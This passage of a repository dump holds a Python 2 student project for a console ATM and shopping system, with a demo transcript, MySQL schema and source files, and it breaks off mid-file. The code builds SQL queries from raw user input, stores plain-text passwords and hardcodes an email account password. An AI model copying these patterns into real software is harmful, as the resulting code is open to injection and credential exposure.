退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 6\nGOODBye!\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):echo\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 1\n您的信用余额为866.5 ------------------这里jack账号为866.5\n\n-----------ATM账号修改密码:\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! 
###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n首先您需要输入您的账号(退出请输入'q'):root2\n请输入您的密码(退出请输入'q'):*********\n####################################################################################################\n\n 1 余额 2 提现\n 3 转账 4 还款\n 5 修改密码 6 退出\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!\n请您选择[1, 2, 3, 4]: 5\n####################################################################################################\n 1 修改密码 2 返回上级菜单 3 退出\n\n####################################################################################################\n请您选择[1, 2, 3]: 1\n请输入您的旧密码:***\n#################您输入的密码是错误的!###################\n请输入您的旧密码:*********\n请您输入您的新密码:****\n请再次您输入您的新密码:****\n###############您两次输入的密码不一致!################\n请您输入您的新密码:********\n请再次您输入您的新密码:*******\n###############您两次输入的密码不一致!################\n请您输入您的新密码:******\n请再次您输入您的新密码:****\n###############您两次输入的密码不一致!################\n###############您输入的次数已经达到3次,请一会再修改!################\n\n\n####################################################################################################\n 1 修改密码 2 返回上级菜单 3 退出\n\n####################################################################################################\n请您选择[1, 2, 3]: 1\n请输入您的旧密码:*********\n请您输入您的新密码:**\n请再次您输入您的新密码:**\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的新密码:******\n请再次您输入您的新密码:******\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的新密码:********\n请再次您输入您的新密码:********\n您修改的密码已经成功!\n\n-----------购物商城演示:\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:2\n首先您需要输入您的账号(退出请输入'q'):root2\n请输入您的密码(退出请输入'q'):********\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 1\n您可以选择购买别的商品!因为目前您的信用卡余额不能支付该商品!\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 4\n您已经购买了 T-shirt,您的余额还有19550\n####################################################################################################\n \tNum. Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 2\n您已经购买了 Iphone,您的余额还有14951\n####################################################################################################\n \tNum. 
Goods Money\n \t1 Car 250000\n \t2 Iphone 4599\n \t3 Mac\t 10000\n \t4 T-shirt 450\n \t5 Bicyle 1500\n \t6 Coffee 60\n\n####################################################################################################\n如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\nPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: 8\n您本次购物的商品有:['T-shirt', 'Iphone']\nGOODBye!\n-----------用户申请信用卡演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n现在开始进行信用卡申请流程!\n请输入账号名:dfjal;f\n请您输入您的密码:******\n请再次您输入您的密码:******\n您输入的密码不符合规则(需要输入6位以上的且有字母和数字组成)\n请您输入您的密码:*****\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n请您输入您的密码:*******\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n请您输入您的密码:*****\n请再次您输入您的密码:****\n###############您两次输入的密码不一致!################\n################你申请账号失败!###############\n\n\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n现在开始进行信用卡申请流程!\n请输入账号名:root2\n请您输入您的密码:*********\n请再次您输入您的密码:*********\n您创建密码已经成功!并且您的信用卡已经申请成功,限额为20000\n\n-----------管理员界面添加账号演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:4\n首先您需要输入您的账号(退出请输入'q'):root\n请输入您的密码(退出请输入'q'):\n############################## 欢迎您登陆管理员界面! ##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:1\n请输入账号名:root2\n请您输入您的密码:*********\n请再次您输入您的密码:*********\n您创建密码已经成功!并且您的信用卡已经申请成功,限额为50000\n\n-----------管理员界面用户额度调整演示:\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:4\n首先您需要输入您的账号(退出请输入'q'):root\n请输入您的密码(退出请输入'q'):\n############################## 欢迎您登陆管理员界面! ##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:2\n请输入您想要调整额度的账号:root2\n目前root2账号的额度为:50000\n请输入您想要调整额度:dfaj;d\n您输入的金额有误,请重新输入!\n请输入您想要调整额度的账号:root4\n您输入的账号不存在!\n请输入您想要调整额度的账号:root2\n目前root2账号的额度为:50000\n请输入您想要调整额度:60000\n您调整的额度已成功!\n\n-----------管理员界面用户账号冻结演示:\n############################## 欢迎您登陆管理员界面! 
##############################\n######################################################################################\n\n 1 添加账号 2 用户额度\n 3 冻结账号 4 返回\n\n如果你退出请按'5'!\n请输入您想要的选项:3\n请输入您想要冻结的账号:jackss\n您已经将jackss账号冻结10分钟!\n\n-----------log.txt内容演示:\n日期\t\t用户\t\t动作\t\t事务\t\t价格\t\t余额\n2016-02-24 21:00:19\troot\trepay_money\t----\t+1000\t1308\n2016-02-24 21:17:13\tjackss\trepay_money\t----\t+1000\t1352\n2016-02-24 21:25:44\troot\trepay_money\t----\t+500\t1808\n\n-----------出账单演示:\n[root@master day05]# ps -ef|grep auto|grep -v grep|grep -v mount\n[root@master day05]# /usr/local/python2.7/bin/python user_main.py\n############################## 欢迎您登陆ATM和购物商城! ##############################\n########### 如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号! ###########\n######################################################################################\n\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n\n如果你退出请按'5'!\n请输入您想要的选项:5\nGOODBye!\n[root@master day05]# ps -ef|grep auto|grep -v grep|grep -v mount\nroot 12341 1 4 13:30 pts/0 00:00:00 /usr/local/python2.7/bin/python /root/s12/day05/auto_calc.py\n\n-----------邮件账单信息:\ndate name act business price balance\n2016-02-24 21:00:19 root repay_money ---- +1000 1308\n2016-02-24 21:25:44 root repay_money ---- +500 1808" }, { "alpha_fraction": 0.5194552540779114, "alphanum_fraction": 0.6459143757820129, "avg_line_length": 31.0625, "blob_id": "ff17b4c109a6708ae81ec2afa498ebb48568e23a", "content_id": "1bbe7abc4e03448c4ea69b82c44fe56f370b1219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/apis/Caltimes.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\nimport time,datetime\n\ndef Caltime(date1,date2):\n date1=time.strptime(date1,\"%Y-%m-%d %H:%M:%S\")\n date2=time.strptime(date2,\"%Y-%m-%d %H:%M:%S\")\n date1=datetime.datetime(date1[0],date1[1],date1[2],date1[3],date1[4],date1[5])\n date2=datetime.datetime(date2[0],date2[1],date2[2],date2[3],date2[4],date2[5])\n #return (date2-date1).days\n #返回两者时间的秒数\n return (date2-date1).seconds\n\n# for example\n# print Caltime('2012-08-16 01:28:33','2012-08-18 06:26:54')\n\n" }, { "alpha_fraction": 0.5649013519287109, "alphanum_fraction": 0.5846313834190369, "avg_line_length": 28.15151596069336, "blob_id": "05154a023eeb9db8308ca073e48e7bf89b6d78cd", "content_id": "2a64212e9e51e75fb6cc8b25ab66af443d2343d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1019, "license_type": "no_license", "max_line_length": 61, "num_lines": 33, "path": "/apis/sendemail.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/local/python2.7/bin/python\n# -*- coding=utf-8 -*-\n\nimport json,time,os\nimport smtplib \nfrom email.mime.text import MIMEText \nfrom email.header import Header\nimport logger\n\ndef s_email(value):\n try:\n subject = \"The credit card's bill!\"\n msg = MIMEText(_text=value, _charset='utf-8')\n msg['Subject'] = Header(subject, 'utf-8') \n #输入Email地址和口令:\n from_addr = '[email protected]'\n password = 'wocaonima!'\n # 输入SMTP服务器地址:\n smtp_server = 'smtp.v-dream.com'\n # 输入收件人地址:\n to_addr = ['[email protected]']\n \n #SMTP协议默认端口是25\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(1)\n server.login(from_addr, password)\n for i in to_addr:\n server.sendmail(from_addr, i, msg.as_string())\n server.quit()\n print 'email send 
success,the address is %s' %to_addr\n except Exception,e:\n print e\n print 'email send failed.' " }, { "alpha_fraction": 0.6598639488220215, "alphanum_fraction": 0.6643990874290466, "avg_line_length": 29.44827651977539, "blob_id": "6effe6dae8d5a2dbcdac719f0c673e16a876ac10", "content_id": "fdfb0bd959d22ba63333c5b4647345f937e3a39a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 946, "license_type": "no_license", "max_line_length": 193, "num_lines": 29, "path": "/apis/mysql.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nimport MySQLdb\n\n\ndef mysql(sql_cmd,sql_type,mode=1):\n\ttry:\n\t\tconn=MySQLdb.connect(host=setting.DATABASE[\"host\"],user=setting.DATABASE[\"user\"],passwd=setting.DATABASE[\"password\"],unix_socket=setting.DATABASE[\"unix_socket\"],port=setting.DATABASE[\"port\"])\n\t\tcur=conn.cursor()\n\t\tconn.select_db('python')\n\t\tcur.execute(sql_cmd)\n\t\tif sql_type == 'select' and mode == 1:\n\t\t\tresult = cur.fetchall()\n\t\t\tglobal new_line\t\t#定义全局变量new_line\n\t\t\tfor (line,) in result:\t\t#从result中取值,并把(,)去掉\n\t\t\t\tnew_line = (line)\n\t\t\treturn new_line\t\t#返回new_line的值\n\t\telif sql_type == 'select' and mode == 2:\n\t\t\tresult = cur.fetchall()\n\t\t\tnew_line = \" \"\n\t\t\tfor (line,) in result:\t\t#从result中取值,并把(,)去掉\n\t\t\t\tnew_line += (line)+\" \"\n\t\t\treturn new_line\t\t#返回new_line的值\n\t\tcur.close()\n\t\tconn.close()\n\texcept MySQLdb.Error,e:\n\t\tprint 'Mysql Error Msg: ',e" }, { "alpha_fraction": 0.42661914229393005, "alphanum_fraction": 0.4789067208766937, "avg_line_length": 43.893333435058594, "blob_id": "459e3fabe14f7a67c471e24c7bf54d163eb34e13", "content_id": "36987a3db73e9b30604286a99fdc27a7fa1b43df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3916, "license_type": "no_license", "max_line_length": 135, "num_lines": 75, "path": "/core/shopping.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import mysql,logger,passwd_getpass\nimport sys\n\ndef decorate(func):\n def inner():\n is_login = login()\n if not is_login[0]:\n return None\n global names\n global passwd\n names=is_login[1]\n passwd=is_login[2]\n func()\n return inner\n\n@decorate\ndef shops():\n global shopping_cart\n shopping_cart = []\n #购物车列表\n while True:\n print 100*'#'\n print 20*' ','\tNum. 
Goods Money '\n print 20*' ','\t1 Car 250000\t \t '\n print 20*' ','\t2 Iphone 4599\t\t '\n print 20*' ','\t3 Mac\t 10000\t\t '\n print 20*' ','\t4 T-shirt 450\t\t '\n print 20*' ','\t5 Bicyle 1500\t\t '\n print 20*' ','\t6 Coffee 60\t\t \\n'\n print 100*'#'\n print \"\\033[35m如果你想返回上一级菜单请输入'7'!或者想退出请输入'8'\\033[0m\"\n num_list = ['1','2','3','4','5','6','7','8']\t#创建一个num的列表\n goods_list = ['Car','Iphone','Mac','T-shirt','Biycle','Coffee']\t\t#创建一个商品的列表\n rmb_list = [250000,4599,10000,450,1500,60]\t\t#创建一个价格的列表\n input_num = raw_input('\\033[31mPlease enter your choice [1, 2, 3, 4, 5, 6, 7, 8]: \\033[0m').strip()\t#输入想要购买商品的num\n if input_num in num_list:\t#如果输入的num存在num_list列表中,执行下面的:\n if input_num != \"7\" and input_num != \"8\":\t#如果输入的num不等于7,就执行下面的:\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查询该用户的money数\n new_money = mysql.mysql(sql_cmd,'select')\n #如果你的余额高于商品的价格就执行下面的,即购买该商品。\n if float(new_money) > int(rmb_list[num_list.index(input_num)]):\n #余额减去价格等到新的余额\n new_money = float(new_money) - int(rmb_list[num_list.index(input_num)])\n sql_cmd = \"update user set money = \" + \"'\" +str(round(new_money,2))+\"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #将商品加入已经购买的列表\n shopping_cart.append(goods_list[num_list.index(input_num)])\n print \"\\033[34m您已经购买了 %s,您的余额还有%s\\033[0m\" % (goods_list[num_list.index(input_num)],round(new_money,2))\n price = '-' + str(rmb_list[num_list.index(input_num)])\n #将本次购物记录写入日志中\n logger.record_log(names,'buy',goods_list[num_list.index(input_num)],price,round(new_money,2))\n else:\n #当你的余额小于商品中最小的价格,就提示你无法再购物了\n if float(new_money) < min(rmb_list):\n print \"\\033[35m您已经没有足够的钱来购买东西,或者你先还款以后再购买!\\033[0m\"\n else:\n print \"\\033[35m您可以选择购买别的商品!因为目前您的信用卡余额不能支付该商品!\\033[0m\"\n elif input_num == '7':\n break\n # return shopping_cart\n elif input_num == '8':\n if len(shopping_cart) > 0:\n print \"\\033[35m您本次购物的商品有:%s\\033[0m\" %shopping_cart\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8####################\\033[0m\"\n\n\nif __name__ == \"__main__\":\n shops()" }, { "alpha_fraction": 0.5266757607460022, "alphanum_fraction": 0.5280437469482422, "avg_line_length": 30.782608032226562, "blob_id": "b382995a2ed9721e2db169fe2344ee82f3677d22", "content_id": "3c363d0f51432e1281895f18200021a5f2a8c034", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "no_license", "max_line_length": 121, "num_lines": 23, "path": "/apis/logger.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding=utf-8 -*-\n\nimport time\nimport os\n\ndef record_log(names,act,things,price,money):\n\t#日志文件名\n\tlogfile = 'log.txt'\n\t#数据插入的日期\n\tdate = time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())\n\trecord_line = date + '\\t' + names + '\\t' + act + '\\t' + things + '\\t' + price + '\\t' + str(money) + '\\n'\n\t#判断日志文件是否存在,如果不存在就创建一个新文件,并插入单位名称\n\tif not os.path.exists(logfile):\n\t\tf = open(logfile,'w')\n\t\t#record = '日期' + '\\t\\t' + '用户' + '\\t\\t' + '动作' + '\\t\\t' + '事务' + '\\t\\t' + '价格' + '\\t\\t' + '余额' + '\\n'\n\t\trecord = 'date' + '\\t\\t' + 'name' + '\\t\\t' + 'act' + '\\t\\t' + 'business' + '\\t\\t' + 'price' + '\\t\\t' + 'balance' + '\\n'\n\t\tf.write(record)\n\t\tf.close()\n\tf = open(logfile,'a')\n\tf.write(record_line)\n\tf.flush()\n\tf.close()\n" }, { "alpha_fraction": 0.5139164924621582, 
"alphanum_fraction": 0.5238568782806396, "avg_line_length": 22.9761905670166, "blob_id": "04e75022283e89ee80c1d13e091aea77bae70c17", "content_id": "ed0184e1d9ece618288c0ec7427818cb3f12dfc3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 60, "num_lines": 42, "path": "/apis/passwd_getpass.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nimport sys\nimport tty\nimport termios\n\ndef getch():\n #获取标准输入的描述符\n fd = sys.stdin.fileno()\n #获取标准输入(终端)的设置\n old_settings = termios.tcgetattr(fd)\n try:\n #改变输入的描述符的模式\n tty.setraw(sys.stdin.fileno())\n #获取输入的一行数据\n ch = sys.stdin.read(1)\n finally:\n #使设置生效\n termios.tcsetattr(fd,termios.TCSADRAIN,old_settings)\n return ch\n\ndef getpass(maskchar=\"*\"):\n password = \"\"\n while True:\n #调用getch函数\n ch = getch()\n #判断是否是回车或者换行\n if ch == \"\\r\" or ch == \"\\n\":\n print\n return password\n #判断是否是退格或者字符串的数值等于127\n #ord函数是将一个字符转换为它的整数值\n elif ch == \"\\b\" or ord(ch) == 127:\n if len(password) > 0:\n sys.stdout.write(\"\\b \\b\")\n password = password[:-1]\n else:\n #如果maskchar不是None,则输出maskchar\n if maskchar != None:\n sys.stdout.write(maskchar)\n password += ch" }, { "alpha_fraction": 0.540772557258606, "alphanum_fraction": 0.6866952776908875, "avg_line_length": 42.75, "blob_id": "5aab92049113abfd92938831d6a73c2997ebd639", "content_id": "446bf5fdddc4610bdeec19bb3ac21dbaad72a332", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 699, "license_type": "no_license", "max_line_length": 100, "num_lines": 16, "path": "/user.sql", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "create database python;\nuse python;\nCREATE TABLE `user` (\n `name` varchar(20) DEFAULT NULL,\n `password` varchar(20) DEFAULT NULL,\n `salary` varchar(10) DEFAULT NULL,\n `money` varchar(10) DEFAULT NULL,\n `status` varchar(10) DEFAULT NULL,\n `lock_time` varchar(20) DEFAULT NULL,\n `interest` varchar(10) DEFAULT NULL,\n `str_interest` char(10) DEFAULT NULL\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;\n\ninsert into python.user values('root','123','15000','15000','unlock','2015-06-08 20:56:09','0','0');\ninsert into python.user values('jack','123','8000','8000','unlock','2015-06-08 20:56:09','0','0');\ninsert into python.user values('echo','123','10000','10000','unlock','2015-06-08 20:56:09','0','0');" }, { "alpha_fraction": 0.4432348310947418, "alphanum_fraction": 0.5054432153701782, "avg_line_length": 29.64285659790039, "blob_id": "6d4cdf0f55f1d108be1088d5ba39dcba59dafc31", "content_id": "575a9d19dddf3026071789bd9ed13f38cc408263", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 95, "num_lines": 42, "path": "/user_main.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom apis import tab\nimport sys,os\nfrom core import atm,register,shopping,manager\n\n\ndef main():\n #启动出账单和计息程序\n global shopping_cart\n if len(os.popen('ps -ef|grep auto_calc.py|grep -v grep').readlines()) == 0:\n os.system('/usr/local/python2.7/bin/python /root/s12/day05/auto_calc.py &')\n #主程序\n while True:\n print 30*'#','\\033[35m欢迎您登陆ATM和购物商城!\\033[0m',30*'#'\n print 11*'#',\"\\033[35m如果您有信用卡请选择'1'或2进入ATM或购物商城菜单,如果你还没有账号请选择'3'申请账号!\\033[0m\",11*'#'\n 
print 86*'#'\n print '''\n 1 ATM 2 购物商城\n 3 申请信用卡 4 管理员界面\n '''\n print \"\\033[35m如果你退出请按'5'!\\033[0m\"\n num_input = raw_input(\"\\033[35m请输入您想要的选项:\\033[0m\")\n if num_input == '1':\n atm.bank()\n elif num_input == '2':\n shopping.shops()\n elif num_input == '3':\n print(\"现在开始进行信用卡申请流程!\")\n register.register()\n elif num_input == '4':\n manager.root_manager()\n elif num_input == '5':\n sys.exit(\"GOODBye!\")\n else:\n print \"\\033[34m###################请输入 1 or 2 or 3 or 4 ####################\\033[0m\"\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.45225101709365845, "alphanum_fraction": 0.4645293354988098, "avg_line_length": 46.30644989013672, "blob_id": "104d4dd17401e366dcf9ce195c6915bbc5708820", "content_id": "bbbb9f7d49f9b0225e7b959fbbbcb9dbdce892ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3168, "license_type": "no_license", "max_line_length": 134, "num_lines": 62, "path": "/auto_calc.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nimport time\nfrom apis import mysql,sendemail\n\n\ndef auto_bill():\n while True:\n #出账单功能,当天数等22的时候出账单\n if (time.ctime()).split(' ')[2] == '22':\n sql_cmd = \"select name from user\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n strings='date' + '\\t\\t' + 'name' + '\\t\\t' + 'act' + '\\t\\t' + 'business' + '\\t\\t' + 'price' + '\\t\\t' + 'balance' + '\\n'\n with open('log.txt','r') as file:\n for j in file:\n # print j.split()[2]\n if i == j.split()[2]:\n strings += j\n #将账单通过邮件发送\n sendemail.s_email(strings)\n #当到达11号的时候首先去判断是否已经还款,如果还没有的话将str_interest字段标记为1,说明还未还款\n if int((time.ctime()).split(' ')[2]) == 11:\n sql_cmd = \"select name from user\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n sql_cmd = \"select money from user where name = \" + \"'\" + i + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + i + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(salary) > float(money):\n sql_cmd = \"update user set str_interest = \" + \"where name = \" + \"'\" + i + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #计息功能,当超过10号的时候就开始计息,直到全部还款完毕!\n if int((time.ctime()).split(' ')[2]) > 10:\n #将str_interest=1的人取出来,说明他们是还没还款的\n sql_cmd = \"select name from user where str_interest='1'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select',mode=2)\n name_list=ret_value.strip().split(\" \")\n for i in name_list:\n sql_cmd = \"select money from user where name = \" + \"'\" + i + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + i + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n if float(salary) > float(money):\n money = (float(salary) - float(money))*0.0005\n sql_cmd = \"select interest from user where name = \" + \"'\" + i + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n ret_value = money + float(ret_value)\n sql_cmd = \"update user set interest = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + i + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n #为了保证一天只执行一次\n for i in range(1440):\n time.sleep(60)\n\n\nif __name__ == \"__main__\":\n auto_bill()" }, { "alpha_fraction": 0.38683584332466125, "alphanum_fraction": 
0.4174046218395233, "avg_line_length": 44, "blob_id": "a66676f06c5b0bc37e01733d765af3909686293e", "content_id": "d4701176a5bc57b1218d2cd72185028596e6a85f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13122, "license_type": "no_license", "max_line_length": 145, "num_lines": 261, "path": "/core/atm.py", "repo_name": "zhulh200868/day05", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding=utf-8 -*-\n\nfrom config import setting\nfrom login import login\nfrom apis import mysql,logger,passwd_getpass\nimport sys\n\ndef display_money():\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\t#查找现余的额度\n ret_value = mysql.mysql(sql_cmd,'select')\n print \"\\033[35m您的信用余额为%s \\033[0m\" % ret_value\n\ndef take_money():\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n input_num = raw_input('\\033[31m请输入您需要提现的额数:\\033[0m').strip()\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if input_num.isdigit():\n if int(input_num)*1.05 > float(ret_value):\n print \"您输入的额数大于您的余额,不能进行提现,请重新输入,谢谢!\"\n else:\n ret_value = float(ret_value) - int(input_num)*1.05\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print \"您提现的额数为:%s元,本次提现成功,并收取%s元的手续费!\" %(str(input_num),str(int(input_num)*0.05))\n print(\"你现在的余额为:%s\" %str(round(ret_value,2)))\n break\n else:\n num += 1\n print(\"您输入的金额有误,请重新输入!\")\n\ndef transfer_money():\n num = 0\n while True:\n if num == 3:\n print(\"您输入错误已经达到3次!\")\n break\n input_name = raw_input('\\033[31m请输入您想转给谁?:\\033[0m').strip()\n input_num = raw_input('\\033[31m请输入您转账的金额:\\033[0m').strip()\n sql_cmd = \"select ifnull((select name from user where name = \" + \"'\" + input_name + \"'\" \"),0000);\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if ret_value == input_name and input_name != names:\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n if input_num.isdigit():\n if int(input_num) > float(ret_value):\n print \"您输入的额数大于您的余额,不能进行提现,请重新输入,谢谢!\"\n else:\n ret_value = float(ret_value) - int(input_num)\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + names + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n sql_cmd = \"select money from user where name = \" + \"'\" + input_name + \"'\" + \";\"\n ret_value = mysql.mysql(sql_cmd,'select')\n ret_value = float(ret_value) + int(input_num)\n sql_cmd = \"update user set money = \" +\"'\"+ str(round(ret_value,2))+ \"'\" + \"where name = \" + \"'\" + input_name + \"'\" + \";\"\n mysql.mysql(sql_cmd,'update')\n print(\"本次转账成功!因为是本行内转账不收取任何手续费!\")\n break\n else:\n num += 1\n print(\"您输入的金额有误,请重新输入!\")\n else:\n num += 1\n print(\"您输入的账号有误或者不能转账给自己,请重新输入!\")\n\ndef repay_money():\n while True:\n print 100*'#'\n print '''\n 1 显示应还款金额 2 还款\n 3 返回上级菜单 4 退出\n '''\n print 100*'#'\n input_num = raw_input('\\033[31m请您选择[1, 2, 3, 4]: \\033[0m').strip()\n if input_num == \"1\":\n sql_cmd = \"select money from user where name = \" + \"'\" + names + \"'\" + \";\"\n money = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select salary from user where name = \" + \"'\" + names + \"'\" + \";\"\n salary = mysql.mysql(sql_cmd,'select')\n sql_cmd = \"select interest from user where name = \" + \"'\" + names 
